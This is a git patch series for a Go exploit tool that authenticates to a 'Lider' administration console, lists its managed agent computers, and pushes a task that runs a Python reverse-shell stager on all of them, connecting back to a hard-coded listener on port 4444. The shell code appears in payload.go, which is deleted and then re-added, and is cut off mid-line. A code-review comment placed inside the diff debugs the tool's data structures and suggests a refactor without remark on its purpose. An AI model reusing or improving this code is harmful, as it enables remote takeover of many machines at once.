From f8c0bef8b75bb0eddfb1d0d26185b5b0070c9583 Mon Sep 17 00:00:00 2001 From: KhanbalaRashidov Date: Thu, 8 Dec 2022 16:27:30 +0300 Subject: [PATCH 1/3] Edit Agent --- main.go | 7 +++---- user.go | 28 +++++++++++++--------------- 2 files changed, 16 insertions(+), 19 deletions(-) diff --git a/main.go b/main.go index bd8cc61..d970980 100644 --- a/main.go +++ b/main.go @@ -10,7 +10,7 @@ import ( var TARGET, LHOST, LPORT string -func main(){ +func main() { print_info("Starting the exploit") @@ -19,7 +19,7 @@ func main(){ LHOST = "172.26.64.120" LPORT = "4444" - TARGETURI := "http://192.168.179.134:8080/lider/config/configurations" + TARGETURI := "http://192.168.179.134:8080/lider/config/configurations" res, err := http.Get(TARGETURI) @@ -73,5 +73,4 @@ func main(){ cu.TriggerPayloadonAllAgents(agents) //fmt.Println(NewPayload()) - -} \ No newline at end of file +} diff --git a/user.go b/user.go index b6b9a17..0a359bf 100644 --- a/user.go +++ b/user.go 
@@ -11,38 +11,36 @@ import ( ) type ConsoleUser struct { - username []string - password []string + username []string + password []string cookieJar *cookiejar.Jar } -func (cu *ConsoleUser)Login() { +func (cu *ConsoleUser) Login() { print_info("Authentication to the console with credentials") time.Sleep(1) - options := cookiejar.Options{ - - } + options := cookiejar.Options{} - jar, err := cookiejar.New(&options) - if err != nil { - panic_with_msg("Something went wront", err) - } + jar, err := cookiejar.New(&options) + if err != nil { + panic_with_msg("Something went wront", err) + } cu.cookieJar = jar client := http.Client{Jar: cu.cookieJar} - resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/login", TARGET), url.Values{ - "password": cu.password, - "username" : cu.username, + resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/login", TARGET), url.Values{ + "password": cu.password, + "username": cu.username, }) if err != nil { panic_with_msg("Unable to login somehow. Dunno why", err) } defer resp.Body.Close() - + body, err := ioutil.ReadAll(resp.Body) if strings.Contains(string(body), "forgot_password") { @@ -50,4 +48,4 @@ func (cu *ConsoleUser)Login() { } print_good("Successfully authenticated to the administrator interface ! ") -} \ No newline at end of file +} From eca5179b65ec6df3544a549ef42e17e0abfc7f08 Mon Sep 17 00:00:00 2001 From: KhanbalaRashidov Date: Thu, 8 Dec 2022 16:28:39 +0300 Subject: [PATCH 2/3] edit --- agent.go | 142 ++++++++++++++++++++++++----------------------------- payload.go | 28 ----------- 2 files changed, 64 insertions(+), 106 deletions(-) delete mode 100644 payload.go diff --git a/agent.go b/agent.go index 5aba0c7..ca09a0e 100644 --- a/agent.go +++ b/agent.go 
@@ -12,94 +12,81 @@ import ( "time" ) -type Agents []struct { - DistinguishedName string `json:"distinguishedName"` - Ou interface{} `json:"ou"` - Cn string `json:"cn"` - UID string `json:"uid"` - Sn interface{} `json:"sn"` - O string `json:"o"` - UserPassword string `json:"userPassword"` - Parent interface{} `json:"parent"` - ParentName interface{} `json:"parentName"` - EntryUUID string `json:"entryUUID"` - HasSubordinates string `json:"hasSubordinates"` - Name string `json:"name"` - IconPath interface{} `json:"iconPath"` - ExpandedUser string `json:"expandedUser"` - Attributes struct { - Owner string `json:"owner"` - EntryUUID string `json:"entryUUID"` - StructuralObjectClass string `json:"structuralObjectClass"` - CreatorsName string `json:"creatorsName"` - UserPassword string `json:"userPassword"` - SubschemaSubentry string `json:"subschemaSubentry"` - Cn string `json:"cn"` - HasSubordinates string `json:"hasSubordinates"` - O string `json:"o"` - CreateTimestamp string `json:"createTimestamp"` - ModifyTimestamp string `json:"modifyTimestamp"` - UID string `json:"uid"` - EntryCSN string `json:"entryCSN"` - ModifiersName string `json:"modifiersName"` - LiderDeviceOSType string `json:"liderDeviceOSType"` - PwdChangedTime string `json:"pwdChangedTime"` - EntryDN string `json:"entryDN"` - } `json:"attributes"` - AttributesMultiValues struct { - Owner []string `json:"owner"` - EntryUUID []string `json:"entryUUID"` - StructuralObjectClass []string `json:"structuralObjectClass"` - CreatorsName []string `json:"creatorsName"` - UserPassword []string `json:"userPassword"` - SubschemaSubentry []string `json:"subschemaSubentry"` - ObjectClass []string `json:"objectClass"` - Cn []string `json:"cn"` - HasSubordinates []string `json:"hasSubordinates"` - O []string `json:"o"` - CreateTimestamp []string `json:"createTimestamp"` - ModifyTimestamp []string `json:"modifyTimestamp"` - UID []string `json:"uid"` - EntryCSN []string `json:"entryCSN"` - ModifiersName []string 
`json:"modifiersName"` - LiderDeviceOSType []string `json:"liderDeviceOSType"` - PwdChangedTime []string `json:"pwdChangedTime"` - EntryDN []string `json:"entryDN"` - } `json:"attributesMultiValues"` - Type string `json:"type"` - Priviliges interface{} `json:"priviliges"` - ChildEntries interface{} `json:"childEntries"` - TelephoneNumber interface{} `json:"telephoneNumber"` - HomePostalAddress interface{} `json:"homePostalAddress"` - CreateDateStr string `json:"createDateStr"` - Mail interface{} `json:"mail"` - SessionList interface{} `json:"sessionList"` - AgentListSize interface{} `json:"agentListSize"` - OnlineAgentListSize interface{} `json:"onlineAgentListSize"` - AgentList interface{} `json:"agentList"` - OnlineAgentList interface{} `json:"onlineAgentList"` - Online bool `json:"online"` +type Attributes struct { + Owner string `json:"owner"` + EntryUUID string `json:"entryUUID"` + StructuralObjectClass string `json:"structuralObjectClass"` + CreatorsName string `json:"creatorsName"` + UserPassword string `json:"userPassword"` + SubschemaSubentry string `json:"subschemaSubentry"` + Cn string `json:"cn"` + HasSubordinates string `json:"hasSubordinates"` + O string `json:"o"` + CreateTimestamp string `json:"createTimestamp"` + ModifyTimestamp string `json:"modifyTimestamp"` + UID string `json:"uid"` + EntryCSN string `json:"entryCSN"` + ModifiersName string `json:"modifiersName"` + LiderDeviceOSType string `json:"liderDeviceOSType"` + PwdChangedTime string `json:"pwdChangedTime"` + EntryDN string `json:"entryDN"` +} + +type AttributesMultiValues struct { + Attributes + ObjectClass []string `json:"objectClass"` } +type Agents []struct { + DistinguishedName string `json:"distinguishedName"` + Ou interface{} `json:"ou"` + Cn string `json:"cn"` + UID string `json:"uid"` + Sn interface{} `json:"sn"` + O string `json:"o"` + UserPassword string `json:"userPassword"` + Parent interface{} `json:"parent"` + ParentName interface{} `json:"parentName"` + EntryUUID string 
`json:"entryUUID"` + HasSubordinates string `json:"hasSubordinates"` + Name string `json:"name"` + IconPath interface{} `json:"iconPath"` + ExpandedUser string `json:"expandedUser"` + Attributes Attributes `json:"attributes"` + AttributesMultiValues AttributesMultiValues `json:"attributesMultiValues"` + Type string `json:"type"` + Priviliges interface{} `json:"priviliges"` + ChildEntries interface{} `json:"childEntries"` + TelephoneNumber interface{} `json:"telephoneNumber"` + HomePostalAddress interface{} `json:"homePostalAddress"` + CreateDateStr string `json:"createDateStr"` + Mail interface{} `json:"mail"` + SessionList interface{} `json:"sessionList"` + AgentListSize interface{} `json:"agentListSize"` + OnlineAgentListSize interface{} `json:"onlineAgentListSize"` + AgentList interface{} `json:"agentList"` + OnlineAgentList interface{} `json:"onlineAgentList"` + Online bool `json:"online"` +} -func (cu *ConsoleUser)NewAgents(agentLdapBaseDn string) *Agents{ +func (cu *ConsoleUser) NewAgents(agentLdapBaseDn string) *Agents { print_info("Getting all the active computers") client := http.Client{Jar: cu.cookieJar} - + v := url.Values{} v.Set("uid", agentLdapBaseDn) v.Set("type", "ORGANIZATIONAL_UNIT") v.Set("name", "Agents") v.Set("parent", "") - resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/lider/computer/getOuDetails", TARGET), v) + resp, err := client.PostForm(fmt.Sprintf("http://%s:8080/lider/computer/getOuDetails", TARGET), v) if err != nil { panic_with_msg("Unable to login somehow. Dunno why", err) } defer resp.Body.Close() - + body, err := ioutil.ReadAll(resp.Body) agents := new(Agents) @@ -112,7 +99,7 @@ func (cu *ConsoleUser)NewAgents(agentLdapBaseDn string) *Agents{ return agents } -func (cu *ConsoleUser)TriggerPayloadonAllAgents(agents *Agents){ +func (cu *ConsoleUser) TriggerPayloadonAllAgents(agents *Agents) { a, err := json.Marshal(agents) 
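Review bot: Embedding `Attributes` in the new `AttributesMultiValues` silently changes every multi-value field from `[]string` to `string`, because the promoted fields keep the same json tags (`owner`, `entryUUID`, … `entryDN`) but now have the scalar type; only `ObjectClass` retains a slice. If the `getOuDetails` response still sends those attributes as JSON arrays, as the removed `[]string` declarations indicate, `json.Unmarshal` into `Agents` leaves each of them empty and returns an `*json.UnmarshalTypeError`; the decode call sits below this hunk, so I cannot see whether that error is checked, but either the run aborts at that point or the agents are re-marshaled in `TriggerPayloadonAllAgents` with `""` where the server previously saw arrays. The multi-value struct needs its own `[]string` field list rather than embedding the single-value one; if the module is on Go 1.18 or later a generic field list keeps the de-duplication this refactor was after (sketch below), otherwise restore the seventeen `[]string` fields as they were before this hunk.
```go
// ldapAttrs is the attribute field list shared by the single-value and
// multi-value views; T is string for "attributes" and []string for
// "attributesMultiValues" (Go 1.18+).
type ldapAttrs[T any] struct {
	Owner     T `json:"owner"`
	EntryUUID T `json:"entryUUID"`
	// … remaining fields, same names and json tags as the current Attributes …
	EntryDN   T `json:"entryDN"`
}

type Attributes = ldapAttrs[string]

type AttributesMultiValues struct {
	ldapAttrs[[]string]
	ObjectClass []string `json:"objectClass"`
}
```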
@@ -159,22 +146,21 @@ func (cu *ConsoleUser)TriggerPayloadonAllAgents(agents *Agents){ }, "activationDate": null } - `, a, (rand.Intn(10000 - 100) + 1000), strings.Replace(NewPayload(), "\"", "\\\"", -1)) + `, a, (rand.Intn(10000-100) + 1000), strings.Replace(NewPayload(), "\"", "\\\"", -1)) client := http.Client{Jar: cu.cookieJar} - resp, err := client.Post(fmt.Sprintf("http://%s:8080/lider/task/execute", TARGET), "application/json", bytes.NewBuffer([]byte(godsJson))) + resp, err := client.Post(fmt.Sprintf("http://%s:8080/lider/task/execute", TARGET), "application/json", bytes.NewBuffer([]byte(godsJson))) if err != nil { panic_with_msg("Unable to triggger the bulk task endpoint", err) } defer resp.Body.Close() - + body, err := ioutil.ReadAll(resp.Body) - if strings.Contains(string(body), "Gonderildi"){ + if strings.Contains(string(body), "Gonderildi") { print_good("Hooold my beer ! Shell storm is coming.") } - -} \ No newline at end of file +} diff --git a/payload.go b/payload.go deleted file mode 100644 index 16f20e8..0000000 --- a/payload.go +++ /dev/null @@ -1,28 +0,0 @@ -package main - -import ( - "encoding/base64" - "fmt" -) - -func NewPayload() string{ - - template := fmt.Sprintf(` -import socket,zlib,base64,struct,time -for x in range(10): - try: - s=socket.socket(2,socket.SOCK_STREAM) - s.connect(('%s',%s)) - break - except: - time.sleep(5) -l=struct.unpack('>I',s.recv(4))[0] -d=s.recv(l) -while len(d) Date: Thu, 8 Dec 2022 16:32:24 +0300 Subject: [PATCH 3/3] Create payload.go edit --- payload.go | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 payload.go diff --git a/payload.go b/payload.go new file mode 100644 index 0000000..b28586f --- /dev/null +++ b/payload.go 
@@ -0,0 +1,28 @@ +package main + +import ( + "encoding/base64" + "fmt" +) + +func NewPayload() string { + + template := fmt.Sprintf(` +import socket,zlib,base64,struct,time +for x in range(10): + try: + s=socket.socket(2,socket.SOCK_STREAM) + s.connect(('%s',%s)) + break + except: + time.sleep(5) +l=struct.unpack('>I',s.recv(4))[0] +d=s.recv(l) +while len(d)